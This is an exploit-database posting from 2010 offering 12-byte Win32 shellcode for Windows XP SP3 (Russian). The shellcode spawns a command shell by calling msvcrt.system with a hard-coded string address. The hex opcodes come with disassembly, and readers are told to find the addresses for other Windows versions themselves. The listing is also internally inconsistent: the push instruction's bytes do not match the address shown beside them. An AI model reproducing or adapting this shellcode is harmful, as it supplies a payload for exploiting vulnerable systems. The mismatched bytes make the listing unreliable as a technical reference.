12 bytes small Win32/XP RU WinExec+ExitProcess cmd shellcode.
811a360edecd49358f880f4c15cadead20ec002b3a90bca090bcf1bbb789c84b
============================================================
win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes
============================================================
Thanks to last cotribution to inj3ct0r.com (WinExec+ExitProcess in 16 bytes).
o-o-o-o-o-o-o-o-o-o-o-o-o-o
Inj3ct0r Exploit Database
My id: http://inj3ct0r.com/author/2274
Original: http://inj3ct0r.com/exploits/11432
o-o-o-o-o-o-o-o-o-o-o-o-o-o
Especially for Inj3ct0r.com
68 9D 61 F9 77 push 0x77C01345
B8 C7 93 C1 77 mov eax,msvcrt.system
FF D0 call eax
In msvcrt.dll at 0x77C01344 We have string ".cmd", that's the trick.
Code will work in WinXP SP3 Pro Rus, in other versions you'd better search
the string and system(char*) address for yourself.
Coded via lord Kelvin.
# Inj3ct0r.com [2010-03-24]